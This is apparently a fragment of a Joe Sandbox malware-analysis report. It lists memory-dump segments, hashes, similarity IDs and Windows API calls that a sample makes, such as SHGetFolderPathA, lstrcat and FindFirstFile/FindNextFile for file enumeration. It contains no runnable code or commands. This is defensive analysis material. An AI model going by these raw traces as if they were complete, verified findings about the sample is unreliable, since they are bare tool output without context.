                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: ae846d8b75fc498aeca4d55ef5f3bf1ac55218501ec02c42b04e73267d4abead
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 0B414971900209AFDF26DF98DD81EEEBBB9BF48304F188199F90567252D3359990DF50
                                      APIs
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A451CA
                                      • lstrcat.KERNEL32(?,00A51058), ref: 00A451E7
                                      • lstrcat.KERNEL32(?,01318928), ref: 00A451FB
                                      • lstrcat.KERNEL32(?,00A5105C), ref: 00A4520D
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44B7C
                                        • Part of subcall function 00A44B60: FindFirstFileA.KERNEL32(?,?), ref: 00A44B93
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC4), ref: 00A44BC1
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC8), ref: 00A44BD7
                                        • Part of subcall function 00A44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00A44DCD
                                        • Part of subcall function 00A44B60: FindClose.KERNEL32(000000FF), ref: 00A44DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 83c54245e91384a988a93e1a8f2f96761222966e8b70a38722baf2ee8c34b61c
                                      • Instruction ID: 86b068dfcf39dc26589f951855873775cf077ee8063e509bab8f5a8848d874c8
                                      • Opcode Fuzzy Hash: 83c54245e91384a988a93e1a8f2f96761222966e8b70a38722baf2ee8c34b61c
                                      • Instruction Fuzzy Hash: DF21CC7A900308ABDB14FBB0ED56FED333CAB94301F004554B659D6191EE74AACCCBA1